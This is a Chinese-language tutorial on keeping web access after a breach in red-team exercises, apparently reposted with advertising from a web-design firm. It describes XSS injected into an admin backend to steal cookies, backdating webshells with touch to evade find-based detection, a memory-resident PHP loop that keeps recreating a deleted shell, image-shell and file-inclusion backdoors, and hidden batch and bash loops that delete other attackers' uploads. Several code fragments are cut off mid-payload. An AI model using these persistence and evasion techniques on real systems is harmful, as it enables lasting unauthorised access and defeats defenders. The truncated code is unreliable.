如何進(jìn)行Web權(quán)限維持分析，很多新手對(duì)此不是很清楚，為了幫助大家解決這個(gè)難題，下面小編將為大家詳細(xì)講解，有這方面需求的人可以來(lái)學(xué)習(xí)下，希望你能有所收獲。

10年的資興網(wǎng)站建設(shè)經(jīng)驗(yàn)，針對(duì)設(shè)計(jì)、前端、開(kāi)發(fā)、售后、文案、推廣等六對(duì)一服務(wù)，響應(yīng)快，48小時(shí)及時(shí)工作處理。成都全網(wǎng)營(yíng)銷(xiāo)的優(yōu)勢(shì)是能夠根據(jù)用戶(hù)設(shè)備顯示端的尺寸不同，自動(dòng)調(diào)整資興建站的顯示方式，使網(wǎng)站能夠適用不同顯示終端，在瀏覽器中調(diào)整網(wǎng)站的寬度，無(wú)論在任何一種瀏覽器上瀏覽網(wǎng)站，都能展現(xiàn)優(yōu)雅布局與設(shè)計(jì)，從而大程度地提升瀏覽體驗(yàn)。創(chuàng)新互聯(lián)建站從事“資興網(wǎng)站設(shè)計(jì)”,“資興網(wǎng)站推廣”以來(lái)，每個(gè)客戶(hù)項(xiàng)目都認(rèn)真落實(shí)執(zhí)行。

前言

權(quán)限維持，在紅藍(lán)對(duì)抗中，我覺(jué)得其意義在于兩點(diǎn)：一是防止已獲取的權(quán)限被藍(lán)隊(duì)破壞；二是防止其他紅隊(duì)獲取到相同的權(quán)限（雖然有點(diǎn)缺德。。。）。

其他情況下的非法用途就不說(shuō)了。

權(quán)限維持的原則我覺(jué)得就是不能影響原來(lái)業(yè)務(wù)的正常運(yùn)行。（比如改后臺(tái)密碼導(dǎo)致管理員不能登錄，修改文件夾讀寫(xiě)權(quán)限導(dǎo)致正常的文件不能上傳等等）。

后臺(tái)權(quán)限維持

當(dāng)我們通過(guò)弱口令或爆破獲取到后臺(tái)權(quán)限，為了防止管理員修改密碼或其他紅隊(duì)修改密碼，失去權(quán)限，在這種情況下需要維持一下后臺(tái)權(quán)限。

自己修改后臺(tái)密碼，當(dāng)然是最笨的辦法。

可以選擇的方法，通過(guò)在后臺(tái)源代碼中插入xss代碼，當(dāng)然這種情況是已經(jīng)獲取到webshell權(quán)限了，當(dāng)管理員訪問(wèn)后臺(tái)時(shí)，我們就能獲取到cookie,具體可參考：

參考

這個(gè)感覺(jué)有點(diǎn)雞肋，因?yàn)橐呀?jīng)有webshell的權(quán)限了，為什么還要維持后臺(tái)權(quán)限呢，但是這個(gè)的好處就是因?yàn)樵谠创a中插入js代碼，不容易被發(fā)現(xiàn)，這是優(yōu)點(diǎn)。

webshell權(quán)限維持

常見(jiàn)的權(quán)限就是webshell的權(quán)限了，當(dāng)獲取到webshell權(quán)限后，有可能別藍(lán)隊(duì)發(fā)現(xiàn)，刪除掉shell,也有可能其他紅隊(duì)也獲取到這個(gè)權(quán)限。考慮到這兩種情況，就需要維持了。

針對(duì)藍(lán)隊(duì)

其他文件夾寫(xiě)入shell：初次上傳路徑一般都是存放圖片等類(lèi)型文件的文件夾，如果在這樣的文件夾中突然出現(xiàn)一個(gè)php后綴的文件，那么十有八九會(huì)被發(fā)現(xiàn)，所以為了避免被藍(lán)隊(duì)發(fā)現(xiàn)，一般做法是在其他可寫(xiě)的文件夾下寫(xiě)入shell。

改寫(xiě)shell的日期：這個(gè)主要針對(duì)linux平臺(tái)，因?yàn)閘inux下webshell查殺工具不多，可能會(huì)通過(guò)命令去查殺。

可能的命令是find命令，比如：

find -name "*.php" -type f -mtime -3 -exec ls -l {} \;

修改方法是touch命令，比如：

touch -d '08-August-2019' rrr.php

效果如下：

寫(xiě)入不死馬：所謂不死馬，就是常駐內(nèi)存的木馬，通過(guò)循環(huán)在某路徑下生成shell來(lái)維持權(quán)限，即使刪除了shell,還是會(huì)生成。網(wǎng)上的不死馬，我試了一下沒(méi)成功，自己改了一下，最簡(jiǎn)單的,不免殺，經(jīng)供參考：

';
	while (1) {
		file_put_contents($file, $code);
		system('touch -m -d "2018-12-01 09:10:12" 3.php');
		usleep(5000);
	}
?>

寫(xiě)入其他后門(mén)：
1.寫(xiě)入命令執(zhí)行后門(mén)，比如：

2.圖片馬結(jié)合文件包含腳本：圖片馬中寫(xiě)入惡意代碼，然后在相應(yīng)位置放置文件包含的漏洞文件，通過(guò)訪問(wèn)文件包含漏洞文件去解析圖片馬，圖片馬生成shell，然后直接連接。

比如，圖片中插入如下代碼，用于生成shell:

")?>

文件包含代碼：

針對(duì)紅隊(duì)

獲取webshell常見(jiàn)的情形是通過(guò)某一個(gè)上傳點(diǎn)上傳馬獲取,上傳的文件夾路徑一般是固定的，不可能一個(gè)文件對(duì)應(yīng)一個(gè)文件夾。

如果想要阻止其他紅隊(duì)獲取到webshell,我的思路是在上傳文件夾下寫(xiě)一個(gè)批處理或bash，循環(huán)判斷當(dāng)前文件夾下的文件類(lèi)型，發(fā)現(xiàn)指定后綴的文件就刪除，代碼大致如下：

Windows：

@echo off
cls 
if "%1"=="h" goto start
start mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit 
:start
for %%i in (*.php) do (del %%i)
choice /t 5 /d y /n >nul
goto start

Linux：

#! /bin/bash 
while true;do 
find . -type f -name "*.php"|xargs rm -rf 
done

看完上述內(nèi)容是否對(duì)您有幫助呢？如果還想對(duì)相關(guān)知識(shí)有進(jìn)一步的了解或閱讀更多相關(guān)文章，請(qǐng)關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝您對(duì)創(chuàng)新互聯(lián)的支持。